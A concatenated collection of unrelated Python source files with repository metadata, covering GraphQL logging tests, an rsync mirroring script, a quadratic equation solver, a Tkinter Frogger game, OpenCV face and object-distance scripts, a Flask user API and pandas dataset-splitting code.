result = await run_query(
query=self.mutation, variables=dict(input=dict(logs=logs)),
)
assert result.data.write_run_logs.success
await asyncio.sleep(0.5)
logs = await models.Log.where({"task_run_id": {"_eq": task_run_id}}).get(
{"message"}
)
assert len(logs) == 14
assert all(log.message == "test" for log in logs)
async def test_create_logs_with_options(self, run_query, flow_run_id):
level = "CRITICAL"
name = "test-logger"
timestamp = pendulum.datetime(2019, 1, 1, 1, 1, 1)
info = {"a": [1, 2, 3]}
payload = dict(
flow_run_id=flow_run_id,
message="test",
level=level,
name=name,
info=info,
timestamp=timestamp.isoformat(),
)
logs = [payload for _ in range(6)]
result = await run_query(
query=self.mutation, variables=dict(input=dict(logs=logs)),
)
assert result.data.write_run_logs.success
await asyncio.sleep(0.5)
logs = await models.Log.where({"flow_run_id": {"_eq": flow_run_id}}).get(
{"message", "info", "timestamp", "name", "level"}
)
assert len(logs) == 6
assert all(log.message == "test" for log in logs)
assert all(log.info == info for log in logs)
assert all(log.timestamp == timestamp for log in logs)
assert all(log.name == name for log in logs)
assert all(log.level == level for log in logs)
async def test_create_logs_with_invalid_level_fails(self, run_query, flow_run_id):
result = await run_query(
query=self.mutation,
variables=dict(
input=dict(
logs=[
dict(flow_run_id=flow_run_id, message="test", level="bad-level")
]
)
),
)
assert "got invalid value 'bad-level'" in result.errors[0].message
async def test_diverse_payloads(self, run_query, flow_run_id):
levels = ["ERROR", "CRITICAL", "INFO", "INFO"]
names = ["test-logger", "foo", "bar", "chris"]
timestamps = [
pendulum.datetime(2019, i + 1, 1, 1, 1, 1).isoformat() for i in range(4)
]
infos = [{let: list(range(i + 1))} for i, let in enumerate("abcd")]
messages = ["do", "rae", "me", "fa"]
payloads = [
dict(
flow_run_id=flow_run_id,
message=messages[i],
level=levels[i],
name=names[i],
info=infos[i],
timestamp=timestamps[i],
)
for i in range(4)
]
await run_query(
query=self.mutation, variables=dict(input=dict(logs=payloads)),
)
await asyncio.sleep(0.5)
logs = await models.Log.where({"flow_run_id": {"_eq": flow_run_id}}).get(
{"message", "info", "timestamp", "name", "level"}
)
assert len(logs) == 4
assert set([log.message for log in logs]) == set(messages)
assert set([log.level for log in logs]) == set(levels)
assert set([log.name for log in logs]) == set(names)
assert set([log.timestamp.isoformat() for log in logs]) == set(timestamps)
stored_infos = [log.info for log in logs]
assert all(info in stored_infos for info in infos)
async def test_create_flow_run_logs_requires_flow_run_id_for_all_logs(
self, run_query, flow_run_id
):
logs_count = await models.Log.where().count()
logs = [dict(flow_run_id=flow_run_id, message="test") for _ in range(9)]
logs.append(dict(flow_run_id=None, message="test"))
result = await run_query(
query=self.mutation, variables=dict(input=dict(logs=logs)),
)
assert result.errors
assert "Expected non-nullable type UUID!" in result.errors[0].message
await asyncio.sleep(0.5)
new_count = await models.Log.where().count()
assert new_count == logs_count
| [
"noreply@github.com"
] | manesioz.noreply@github.com |
1673869e25c4e792d07a567dfdf2bb620603032d | e3c2844608c8776ff0346db719500a4a9aa0aabb | /test.py | 35a6fd7ff4612e8c82b96d49dca59c1fe8effdce | [] | no_license | z0by/mirror-scripts | f2c8d1fb1639166fabbf917306bf2e0338eca98f | 78ecac06862e5d43231680508e932278bd488ffe | refs/heads/master | 2016-08-08T18:52:32.921736 | 2016-02-20T08:51:37 | 2016-02-24T10:29:52 | 52,144,681 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,445 | py | #!/usr/bin/env python
import os
import sys
import yaml
import logging
import subprocess
def run_cmd(cmdline, stdout=False, stderr=False, stdin=False, shell=False):
p = subprocess.Popen(cmdline, stdout=stdout, stderr=stderr, stdin=stdin,
shell=shell)
out, err = p.communicate()
if p.returncode != 0:
raise RuntimeError(
"{0} failed, status code {1} stdout {2} stderr {3}".format(
cmdline, p.returncode, stdout, stderr)
)
return out, err, p.returncode
def via_rsync(srcpath, destpath, exclude=None, latest=None):
rsync_cmd = [
"rsync", '--verbose', '--archive', "--delete", "--numeric-ids",
"--acls", "--xattrs", "--sparse", "--no-owner", "--no-group",
]
if latest:
if not os.path.exists(latest):
os.makedirs(latest)
rsync_cmd.append("--link-dest={}".format(latest))
if exclude:
exclude = exclude.split()
for ex in exclude:
rsync_cmd.append(ex)
rsync_cmd.append(srcpath)
rsync_cmd.append(destpath)
run_cmd(rsync_cmd)
def load_config(conf_file):
with open(conf_file, 'r') as f:
try:
data = yaml.load(f)
return data
except yaml.parser.ParserError:
print "Invalid Compose Yaml file!"
raise
def parse_options(args):
from argparse import ArgumentParser
parser = ArgumentParser()
parser.add_argument(
'-v', '--version', action='version', version='0.1')
parser.add_argument(
"--debug", action='store_true', help='enable debug mode', default=False)
return parser.parse_args(args)
def main(args):
options = parse_options(args)
if options.debug:
logging.basicConfig(stream=sys.stderr, level=logging.DEBUG)
else:
logging.getLogger().setLevel(logging.INFO)
logging.getLogger().addHandler(logging.handlers.SysLogHandler())
logging.debug("%s - %s", options.source[0], options.mountpoint[0])
if __name__ == '__main__':
# main(sys.argv[1:])
data = load_config('config.yaml')
srcpath = "/home/uladzimir/Work/mirrors/test"
destpath = "/media/mirrors/mirrors/files"
exclude = "--exclude=*.conf --exclude=ppc* --exclude=4* --exclude=5* --exclude=7* --exclude=testing"
latest = "/media/mirrors/mirrors/files/latest-test"
#via_rsync(srcpath, destpath, exclude, latest)
run_cmd(["./test.sh"]) | [
"uniakhai@mirantis.com"
] | uniakhai@mirantis.com |
de8719da1cba865e5be9cf02e409206fec0dc5f8 | aa4741b2b503b19612f7101412ba9ae8717f4547 | /weather_app/the_weather/the_weather/wsgi.py | 7b0c3aa9cd1f75739a957c1193d1ebaf68cb96bd | [] | no_license | igor-QA/WeatherApp | da336140efa076ed952cb30d4cffb9219292b022 | 055fc2474ca7bb1d794dad8687ee7e962479831c | refs/heads/master | 2022-11-08T05:52:45.239660 | 2020-06-26T16:37:45 | 2020-06-26T16:37:45 | 275,146,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 172 | py | import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "the_weather.settings")
application = get_wsgi_application()
| [
"igortvk@ya.ru"
] | igortvk@ya.ru |
ae36976672c1d15131b749192948515de6c6f94d | bdc255daa00a691dcd4107a9cab76525623e998e | /computor.py | 5383f487dc8bed60145d31308de29d090430f314 | [] | no_license | dishults/computorv1 | 739d47028172f5923b7a4b536d0af03bf9059dbf | e81d333a2f9b79214e0d5fdaec29b3d49a3079cc | refs/heads/main | 2023-01-02T14:40:20.335876 | 2020-10-27T11:53:01 | 2020-10-27T11:53:01 | 301,402,572 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,327 | py | #!/usr/bin/python3
import sys
class Polynomial:
all_terms = {}
degree = 0
def __init__(self, sign, coefficient, variable, exponent, inverse=False):
"""Example -- '+', '5', 'X', '0'"""
try:
self.coefficient = float(sign + coefficient)
except:
self.coefficient = float(coefficient)
self.variable = variable
self.exponent = int(exponent)
if inverse:
self.coefficient *= -1
def __str__(self):
num = abs(self.coefficient)
if num % 1 == 0:
num = int(num)
return f"{num} * {self.variable}^{self.exponent}"
@classmethod
def get_terms(cls, equation):
def proceed(terms, inverse):
for i in range(0, len(terms), 4):
variable, exponent = terms[i+3].split("^")
term = Polynomial(terms[i], terms[i+1], variable, exponent, inverse=inverse)
if term.exponent in cls.all_terms:
cls.all_terms[term.exponent].coefficient += term.coefficient
else:
cls.all_terms[term.exponent] = term
left, right = equation.split("=")
terms = ["+"] + left.split()
if not (terms[1] == '0' and len(terms) == 2):
proceed(terms, inverse=False)
terms = ["+"] + right.split()
if not (terms[1] == '0' and len(terms) == 2):
proceed(terms, inverse=True)
@classmethod
def print_reduced_form(cls):
print("Reduced form: ", end="")
try:
term = cls.all_terms[0]
if term.coefficient < 0:
print(f"-{term}", end="")
else:
print(term, end="")
except:
pass
for i in range(1, len(cls.all_terms)):
try:
term = cls.all_terms[i]
if term.coefficient > 0:
sign = " +"
else:
sign = " -"
print(sign, term, end="")
except:
pass
print(" = 0")
@classmethod
def print_degree(cls):
terms = cls.all_terms
try:
exponents = [terms[t].exponent for t in terms.keys() if terms[t].coefficient != 0]
cls.degree = max(exponents)
except:
cls.degree = 0
print("Polynomial degree: ", cls.degree)
@classmethod
def solve(cls):
"""Solve Linear and Quadratic equations."""
if cls.degree > 2:
sys.exit("The polynomial degree is strictly greater than 2, I can't solve.")
if cls.degree == 0:
"""n * X^0 = 0"""
n = cls.all_terms[0].coefficient
if n != 0:
sys.exit("The eqution has no solution")
print("Every real number is a solution")
elif cls.degree == 1:
print("b * X^0 + a * X^1 = 0")
a = cls.all_terms[1].coefficient
b = cls.all_terms[0].coefficient
print("\nLinear Formula:")
print(linear_formula.__doc__)
print("a = ", a)
print("b = ", b)
linear_formula(a, b)
elif cls.degree == 2:
print("c * X^0 + b * X^1 + a * X^2 = 0")
a = cls.all_terms[2].coefficient
b = cls.all_terms[1].coefficient
c = cls.all_terms[0].coefficient
discriminant = (b ** 2) - (4 * a * c)
two_a = 2 * a
print("\nQuadratic Formula:")
print(quadratic_formula.__doc__)
print("a = ", a)
print("b = ", b)
print("c = ", c)
print("2a = ", two_a)
print("discriminant (b^2 - 4ac) = ", discriminant)
if discriminant == 0:
print("\n\033[1mDiscriminant is 0\033[0m")
print("To solve we would have to do: x = -b / 2a")
linear_formula(two_a, b)
else:
if discriminant > 0:
print("\n\033[1mDiscriminant is strictly positive.\033[0m")
quadratic_formula(two_a, b, discriminant)
else:
print("\n\033[1mDiscriminant is strictly negative.\033[0m",
"\nSo we would have to calculate complex solutions",
"with real and imaginary parts")
quadratic_formula(two_a, b, discriminant, simple=False)
def linear_formula(a, b):
"""
x = -b / a
"""
print("\nThe solution is:")
if b == 0 and a == 0:
print("Every real number is a solution")
elif a == 0:
sys.exit("The eqution has no solution")
elif b == 0:
print(0)
else:
print(f"\033[1m{-b / a}\033[0m")
def quadratic_formula(two_a, b, discriminant, simple=True):
"""
-b +- sqrt(b^2 - 4ac)
x = —————————————————————
2a
"""
if simple:
sqrt = discriminant ** 0.5
print("sqrt (discriminant ** 0.5) =", sqrt)
x1 = (-b - sqrt) / two_a
x2 = (-b + sqrt) / two_a
print("\nThe two solutions are:")
print("x1 (-b - sqrt) / 2a =\033[1m", round(x1, 6), "\033[0m")
print("x2 (-b + sqrt) / 2a =\033[1m", round(x2, 6), "\033[0m")
else:
discriminant *= -1
print(f"\n=> convert discriminant (b^2 - 4ac) to positive = {discriminant}")
sqrt = discriminant ** 0.5
print("=> calculate sqrt (discriminant ** 0.5) =", sqrt)
real = -b / two_a
print("=> calculate real part (-b / two_a) = ", real)
imaginary = sqrt / two_a
print("=> calculate imaginary part (sqrt / 2a) = ", imaginary)
print("\nThe two complex solutions are:")
print(f"real - imaginary = \033[1m{round(real, 6)} - {round(imaginary, 6)}i\033[0m")
print(f"real + imaginary = \033[1m{round(real, 6)} + {round(imaginary, 6)}i\033[0m")
def main():
if len(sys.argv) != 2:
sys.exit('Usage: ./computor.py "5 * X^0 + 4 * X^1 - 9.3 * X^2 = 1 * X^0"')
Polynomial.get_terms(sys.argv[1])
Polynomial.print_reduced_form()
Polynomial.print_degree()
Polynomial.solve()
if __name__ == "__main__":
main() | [
"me@manhattan.lan"
] | me@manhattan.lan |
f8596b927edfc2a86c973b5a9f3277105aebc388 | 7b23bf827adcee44060d0271a13b066293e96485 | /Problem Solving/Implementation/Repeated String.py | 29822a635adca6f72c93121bbf3a12151e1a9168 | [] | no_license | PinkFromTheFuture/HackerRank | 89072e085b70be0f2e445c0839454cacaed9c3c5 | 7b52a9e11093fa5935d4ec6b719fce257aa270cd | refs/heads/master | 2022-06-26T10:51:14.444711 | 2019-08-02T13:38:52 | 2019-08-02T13:38:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | '''https://www.hackerrank.com/challenges/repeated-string/problem
'''
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the repeatedString function below.
def repeatedString(s, n):
# count the ocurrencies in the base string
count_in_base_string = s.count('a')
# print('count_in_base_string: {}'.format(count_in_base_string))
# expand the base string and get the count from the ocurrencies of the whole string
len_of_s = len(s)
count = (n // len_of_s) * count_in_base_string
# print('count: {}'.format(count))
# add in the remaining ones from the non whole expansion
# print('n % len_of_s: {}'.format(n % len_of_s))
i = 0
while (i < n % len_of_s):
if s[i] == 'a':
count += 1
i += 1
return count
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
s = input()
n = int(input())
result = repeatedString(s, n)
fptr.write(str(result) + '\n')
fptr.close()
| [
"eduardoxfurtado@gmail.com"
] | eduardoxfurtado@gmail.com |
b52c0e5bdece5cc5f07c35478a9f20106d67b693 | 39daa2ec924f3d92d73d9cb59d99ddc069d0683b | /Exams/exam prep 2018-03-08/02.py | d4a3165ffff368b43740ebe70d013aed275eb70e | [
"MIT"
] | permissive | Bugzey/Softuni-Python-Fundamentals | ab2737f4393266aae096bf7f57ebfa77f0ce8a3b | 6f66e143809988398896cfc771cce1db9220df27 | refs/heads/master | 2021-03-23T06:00:41.811397 | 2020-03-15T08:46:47 | 2020-03-15T08:46:47 | 247,428,961 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,966 | py | # String commander v02
def exchange(input_list, length):
result = input_list[(length + 1):] + input_list[:(length + 1)]
return(result)
def extreme(input_list, extreme_type, num_type):
if extreme_type == 'max':
func = max
elif extreme_type == 'min':
func = min
cur_mod = 0 if num_type == 'even' else 1 if num_type == 'odd' else -1
all_num_types = list(filter(lambda y: y % 2 == cur_mod, input_list))
if len(all_num_types) == 0:
return('No matches')
cur_extreme = func(all_num_types)
indices = [index for index, num in enumerate(input_list) if num == cur_extreme]
result = indices[-1]
return(result)
def side(input_list, side_type, length, num_type):
list_len = len(input_list)
if num_type == 'odd':
odd = True
elif num_type == 'even':
odd = False
length = int(length)
nums = list(filter(lambda x: x % 2 == 0 + odd * 1, input_list))
if length > list_len:
return('Invalid count')
if side_type == 'first':
result = nums[:length]
elif side_type == 'last':
result = nums[-1::-1][:length]
return(result)
user_input = input().split(' ')
user_list = list(map(int, user_input))
while True:
user_input = input().split(' ')
if user_input[0] == 'end':
break
command = user_input[0]
args = user_input[1:]
if command == 'exchange':
arg = int(args[0])
if arg + 1> len(user_list) or arg < 0:
print('Invalid index')
continue
user_list = exchange(user_list, arg)
elif command in ['max', 'min']:
num_type = args[0]
result = extreme(user_list, command, num_type)
print(result)
elif command in ['first', 'last']:
side_type = command
length, num_type = args[0:2]
length = int(length)
result = side(user_list, side_type, length, num_type)
print(result)
print(user_list)
| [
"radddi@abv.bg"
] | radddi@abv.bg |
1ae1c06a4d9808347ac1b53b64efffff089681c8 | fae454e66b9280821b3364d933979303df5cadcc | /FroggerProj.py | dd7e3a21a211ee659390e31e21e046351bd3c11d | [] | no_license | johnthekid/FroggerProject | 419c244500a389617339679b788a3c0c309bca03 | 35bfd4482b45cb282824cbd38054b09245e84259 | refs/heads/master | 2021-01-18T13:29:42.233838 | 2014-12-04T21:00:21 | 2014-12-04T21:00:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,660 | py | from Tkinter import *
root = Tk()
drawpad = Canvas(root, width=800,height=600, background='gray')
player = drawpad.create_oval(390,580,410,600, fill="blue")
car1 = drawpad.create_rectangle(50,50,100,60, fill="red")
car2 = drawpad.create_rectangle(50,50,100,60, fill="red")
direction = 5
direction = -5
fast = 7
class myApp(object):
def __init__(self, parent):
global drawpad
self.myParent = parent
self.myContainer1 = Frame(parent)
self.myContainer1.pack()
drawpad.pack()
root.bind_all('<Key>', self.key)
self.animate()
def animate(self):
global drawpad
global enemy
global fast
global direction
x1,y1,x2,y2 = drawpad.coords(car1)
px1,py1,px2,py2 = drawpad.coords(player)
if x2 > 800:
direction = - 5
elif x1 < 0:
direction = 5
drawpad.move(car1, direction, 0)
drawpad.after(5,self.animate)
x1,y1,x2,y2 = drawpad.coords(car2)
if x2 > 800:
fast = - 7
elif x1 < 0:
fast = 7
drawpad.move(car2, fast, 0)
def key(self,event):
global drawpad
global player
if event.char == "w":
drawpad.move(player,0,-4)
if event.char == "s":
drawpad.move(player,0,4)
if event.char == "d":
drawpad.move(player,4,0)
if event.char == "a":
drawpad.move(player,-4,0)
def collisionDetect(self, player):
rx1,ry1,rx2,ry2 = drawpad.coords(player)
app = myApp(root)
root.mainloop() | [
"jsan77@yahoo.com"
] | jsan77@yahoo.com |
9587ab6da0f161dabef2e8887d0ad95d233adc82 | 53d824c3b9d83382367bebb6802f98138e997465 | /square.py | 6fdcf10cbb0d7188bfa764af47af8228f03d3a0a | [] | no_license | MwasCipher/FullStack-Nanodegree | 9d34dde9d9ec56d127b2761246c326ba4db8ffa1 | 20ed4007442adcfca0bcdf67d3c6a478d29302db | refs/heads/master | 2020-08-22T09:16:05.930709 | 2019-11-15T20:33:39 | 2019-11-15T20:33:39 | 216,363,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | import turtle
def draw_square(brad):
for i in range(1, 5):
brad.forward(100)
brad.right(90)
def draw_art():
brad = turtle.Turtle()
brad.color('yellow')
brad.shape('turtle')
brad.speed(2)
window = turtle.Screen()
window.setup(800, 600)
window.bgcolor('red')
for i in range(1, 37):
draw_square(brad)
brad.right(10)
window.exitonclick()
draw_art()
| [
"mwangicollinswaweru@gmail.com"
] | mwangicollinswaweru@gmail.com |
df5adcdae70cdbfbaf9f966b0d9c961df085724b | d1b4d99cf0ce3f46ef844f9def5b31204be0edb6 | /app/api/v1/user.py | 5156679d21d6594f89d6eb7edeb7ccd37e14bb6c | [
"MIT"
] | permissive | xu20065953/ginger | 2d772c26cfa7046c2f9db329d7e532476916c03f | a493f9a4cef9f77a691f5fbad3e074344b7a8e50 | refs/heads/master | 2022-12-19T23:17:53.758673 | 2019-01-10T05:57:34 | 2019-01-10T05:57:34 | 161,883,753 | 0 | 0 | MIT | 2022-12-08T01:28:56 | 2018-12-15T08:04:56 | Python | UTF-8 | Python | false | false | 1,124 | py | # -*- coding: utf-8 -*-
# @Author : jjxu
# @time: 2018/12/15 16:59
from flask import jsonify, g, render_template
from app.libs.error_code import DeleteSuccess
from app.libs.redprint import Redprint
from app.libs.token_auth import auth
from app.models.base import db
from app.models.user import User
api = Redprint("user")
@api.route('/<int:uid>', methods=['GET'])
@auth.login_required
def super_get_user(uid):
user = User.query.filter_by(id=uid).first_or_404()
# r = {
# "id": user.id,
# "nickname": user.nickname,
# "email": user.email
# }
return jsonify(user)
@api.route("", methods=["GET"])
@auth.login_required
def get_user():
uid = g.user.uid
user = User.query.filter_by(id=uid).first_or_404()
return jsonify(user)
# 注销用户自己
@api.route("/delete", methods=["DELETE"])
@auth.login_required
def delete_user():
uid = g.user.uid
with db.auto_commit():
user = User.query.filter_by(id=uid, status=1).first_or_404()
user.delete()
return DeleteSuccess()
@api.route("/test")
def test():
return render_template("test.html")
| [
"20065953@163.com"
] | 20065953@163.com |
a2168d5677c2caa4500d906a9740cd98471463ba | f5772316b7bf1316c8a673aed9007acd76b7d455 | /matching/tatacliq.py | 5b63d24c7df68904eff58ba5d17fa90a29598753 | [] | no_license | yuri0051/scraping | 7e5f0983790050f9366375a7a730aecb93c8ebd5 | aaf52d386ee1aca1f33377b2ed6adc7d63400cc6 | refs/heads/master | 2021-06-25T17:03:08.492990 | 2017-06-29T22:57:27 | 2017-06-29T22:57:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 624 | py | import pandas as pd
from pymongo import MongoClient
def tatacliq():
client = MongoClient()
db = client.stores
coll = db.full_collection.find({'source': 'tatacliq.com'})
df = pd.DataFrame(list(coll))
df = df.apply(get_lower, axis=1)
print df['category'].unique()
def get_lower(row):
try:
row['brand'] = row['brand'].lower()
if row['category'] == 'air conditioner':
row['category'] = 'air conditioners'
if row['category'] == 'laptop':
row['category'] = 'laptops'
except:
pass
return row
if __name__ == "__main__":
tatacliq()
| [
"yury0051@gmail.com"
] | yury0051@gmail.com |
3163d837b5c97aaf7f586933e8dcab6776af8bc3 | 640c447853ca3a7b5cd005fd1306b0086e2f026e | /extractor_mvp.py | 9a6387191b1e9f3bed64c172b6240927929b02e4 | [] | no_license | jordilag/handball_temp | aeef298954de95bae6d9768cb1f3b3aff7786a9a | 734334fa421e752b7d5c56287dffa4ba1d5b5803 | refs/heads/master | 2022-12-08T02:48:30.791519 | 2020-08-28T15:13:42 | 2020-08-28T15:13:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,616 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Dec 31 08:16:22 2019
@author: FranciscoP.Romero
Player of the Match extractor
"""
import pandas as pd
headers = ['Match', 'Team','No.','Name', 'Role']
path = 'C:/Users/FranciscoP.Romero/Desktop/euro2020/'
match = '01'
team = ''
number = ''
values = []
rows_players = []
for i in range (1, 66):
match = (str(i) if (i >= 10) else ('0' + str(i)) )
state = 0
with open( path + match + '.csv') as f:
for linea in f:
if (linea.find('the Match') != -1):
lin_sepl = linea.split(sep=',')
# exttract team and number
if lin_sepl[1] == '':
team = lin_sepl[2]
number = lin_sepl[4]
else:
team = lin_sepl[1]
number = lin_sepl[3]
# extract name
name = ''
for l in lin_sepl[4:]:
if (l != '' and not l.isdigit()):
if (name == ''):
name += l.upper() + ' '
else:
name += l.strip()
# role goalkeeper or field player
role = 'FP' #if (name in goalkeepers) else 'FP'
## add file
rows_players.append([match, team, number, name, role])
import pandas as pd
df_players = pd.DataFrame(rows_players, columns = headers )
df_players.set_index('Match', inplace = True)
df_players.to_csv("euro2020_playersofthematch.csv")
| [
"franciscop.romero@uclm.es"
] | franciscop.romero@uclm.es |
94a080fcf8167830d057872fc075335e8ba477dd | fd27aa04f17b926bf09b3991f21b4f26c632a713 | /src/main/main.py | 7155b9662b77af89dc0850aada900bb049527af0 | [] | no_license | Ankitmahadevan/opencv-python-basic-project | e6a79c553e591cbee7153f3bed01375f5eb62bfd | ba9b29bf27c1cc43eba8b6cf8f9f9d069d3082b8 | refs/heads/master | 2020-03-21T16:40:44.913581 | 2016-06-05T16:42:57 | 2016-06-05T16:42:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,181 | py | import numpy as np
import cv2
cap = cv2.VideoCapture(0)
while (cap.isOpened()):
# Capture frame-by-frame
ret, frame = cap.read()
# Our operations on the frame come here
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Face and eye cascade
face_cascade = cv2.CascadeClassifier('../resources/haarcascade_frontalface_default.xml')
eye_cascade = cv2.CascadeClassifier('../resources/haarcascade_eye.xml')
# Detect faces
faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# Show detected faces
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 1)
roi_gray = gray[y:y + h, x:x + w]
roi_color = frame[y:y + h, x:x + w]
eyes = eye_cascade.detectMultiScale(roi_gray)
# Show detected eyes
for (ex, ey, ew, eh) in eyes:
cv2.rectangle(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 255, 0), 1)
# Display the resulting frame
cv2.imshow('OpenCV Basic Project', frame)
# Close program by using key
if cv2.waitKey(10) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
| [
"ugnius.malukas@gmail.com"
] | ugnius.malukas@gmail.com |
d54cd464f6c8823ed9926d5ad23dadc364c6000a | 664f0ef6973f813afcf1703906584fadd5569876 | /objectDistance.py | 081ec22059f7dfd617036c9123f6f460d3958036 | [] | no_license | tjan90/driver-fatigue-detection-tools | c0e781aed7d72ccc5e416d60ced852c4a0628527 | 42845f5158cf4b1513380e0628d8979e4987412f | refs/heads/main | 2023-06-12T13:00:54.336523 | 2021-06-15T19:32:03 | 2021-06-15T19:32:03 | 376,984,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,308 | py | # import the necessary packages
from scipy.spatial import distance as dist
from imutils import perspective
from imutils import contours
import numpy as np
import argparse
import imutils
import cv2
def midpoint(ptA, ptB):
return ((ptA[0] + ptB[0]) * 0.5, (ptA[1] + ptB[1]) * 0.5)
# construct the argument parse and parse the arguments
#
# ap = argparse.ArgumentParser()
# ap.add_argument("-i", "--image", required=True,help="path to the input image")
# ap.add_argument("-w", "--width", type=float, required=True, help="width of the left-most object in the image (in inches)")
# args = vars(ap.parse_args())
def object_dist(image):
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (7, 7), 0)
# perform edge detection, then perform a dilation + erosion to
# close gaps in between object edges
edged = cv2.Canny(gray, 50, 100)
edged = cv2.dilate(edged, None, iterations=1)
edged = cv2.erode(edged, None, iterations=1)
# find contours in the edge map
cnts = cv2.findContours(edged.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = imutils.grab_contours(cnts)
# sort the contours from left-to-right and, then initialize the
# distance colors and reference object
(cnts, _) = contours.sort_contours(cnts)
colors = ((0, 0, 255), (240, 0, 159), (0, 165, 255), (255, 255, 0),
(255, 0, 255))
refObj = None
# loop over the contours individually
for c in cnts:
# if the contour is not sufficiently large, ignore it
if cv2.contourArea(c) < 100:
continue
# compute the rotated bounding box of the contour
box = cv2.minAreaRect(c)
box = cv2.boxPoints(box) if imutils.is_cv2() else cv2.boxPoints(box)
box = np.array(box, dtype="int")
# order the points in the contour such that they appear
# in top-left, top-right, bottom-right, and bottom-left
# order, then draw the outline of the rotated bounding
# box
box = perspective.order_points(box)
# compute the center of the bounding box
cX = np.average(box[:, 0])
cY = np.average(box[:, 1])
# if this is the first contour we are examining (i.e.,
# the left-most contour), we presume this is the
# reference object
if refObj is None:
# unpack the ordered bounding box, then compute the
# midpoint between the top-left and top-right points,
# followed by the midpoint between the top-right and
# bottom-right
(tl, tr, br, bl) = box
(tlblX, tlblY) = midpoint(tl, bl)
(trbrX, trbrY) = midpoint(tr, br)
# compute the Euclidean distance between the midpoints,
# then construct the reference object
D = dist.euclidean((tlblX, tlblY), (trbrX, trbrY))
refObj = (box, (cX, cY), D / args["width"])
continue
# draw the contours on the image
orig = image.copy()
cv2.drawContours(orig, [box.astype("int")], -1, (0, 255, 0), 2)
cv2.drawContours(orig, [refObj[0].astype("int")], -1, (0, 255, 0), 2)
# stack the reference coordinates and the object coordinates
# to include the object center
refCoords = np.vstack([refObj[0], refObj[1]])
objCoords = np.vstack([box, (cX, cY)])
# loop over the original points
for ((xA, yA), (xB, yB), color) in zip(refCoords, objCoords, colors):
# draw circles corresponding to the current points and
# connect them with a line
cv2.circle(orig, (int(xA), int(yA)), 5, color, -1)
cv2.circle(orig, (int(xB), int(yB)), 5, color, -1)
cv2.line(orig, (int(xA), int(yA)), (int(xB), int(yB)),
color, 2)
# compute the Euclidean distance between the coordinates,
# and then convert the distance in pixels to distance in
# units
D = dist.euclidean((xA, yA), (xB, yB)) / refObj[2]
(mX, mY) = midpoint((xA, yA), (xB, yB))
cv2.putText(orig, "{:.1f}in".format(D), (int(mX), int(mY - 10)),
cv2.FONT_HERSHEY_SIMPLEX, 0.55, color, 2)
# show the output image
return orig | [
"tjan90@yahoo.com"
] | tjan90@yahoo.com |
d776af68f0585eb99721284de11db1090030affe | f860af784ebe80c5dc1ef09e9939c9439eb9e4a8 | /extract_feature/creat_dataframe_label.py | 89f50c4d4cfaa793ef825630e68f22bb78b80145 | [] | no_license | hanghust/preprocessing_data_for_sematic_segmentation | 6bd5b61b322e049b11512c6fb1c2eb989180aef7 | 553485919a3a247e054ffc6f6aa74af3138dd93e | refs/heads/main | 2023-01-14T02:16:15.355873 | 2020-11-17T02:13:48 | 2020-11-17T02:13:48 | 313,476,166 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,944 | py | from extract_information_image import extract_all_path, EDA_data_label
import numpy as np
import pandas as pd
# all file
def load_file_csv(path, file_name):
path_list = extract_all_path(path, 'csv')
data = pd.read_csv(path_list[0])
for path_file in path_list[1:]:
data1 = pd.read_csv(path_file)
data = data.append(data1)
data.to_csv(path + file_name+ '.csv', index=False)
EDA_data_label(path + file_name+ '.csv', path + file_name + '.png')
load_file_csv('data/data_0930_merge_2/data_unmerge/test/', 'data_test')
# each file
def split_train_test_data(path):
path_list = extract_all_path(path, 'csv')
for path_file in path_list:
data = pd.read_csv(path_file)
data_group = data.groupby(['names_image', 'list_label'], axis=0).count().reset_index()
data_group = data_group.sample(len(data_group))
msk = np.random.rand(len(data_group)) < 0.8
train_merge = data_group[msk]
test_merge = data_group[~msk]
print(train_merge.shape)
print(test_merge.shape)
# train.to_csv('data/data_0930_merge_2/train_merge.csv',index=False)
# test.to_csv('data/data_0930_merge_2/test_merge.csv', index=False)
# data = pd.read_csv('data/data_0930_merge_2/data_0930_merge_2.csv')
# train_label = pd.read_csv('data/data_0930_merge_2/train_merge.csv')
train = data[~data['names_image'].isin(train_merge['names_image'])]
test = data[~data['names_image'].isin(test_merge['names_image'])]
if len(train) > len(test):
train.to_csv('data/data_0930_merge_2/data_unmerge/train/'+ path_file.split('/')[-1], index=False)
EDA_data_label('data/data_0930_merge_2/data_unmerge/train/'+ path_file.split('/')[-1],
'data/data_0930_merge_2/data_unmerge/train/'+ (path_file.split('/')[-1]).split('.')[0]+'.png')
test.to_csv('data/data_0930_merge_2/data_unmerge/test/'+ path_file.split('/')[-1], index=False)
EDA_data_label('data/data_0930_merge_2/data_unmerge/test/' + path_file.split('/')[-1],
'data/data_0930_merge_2/data_unmerge/test/' + (path_file.split('/')[-1]).split('.')[0] + '.png')
else:
train.to_csv('data/data_0930_merge_2/data_unmerge/test/' + path_file.split('/')[-1], index=False)
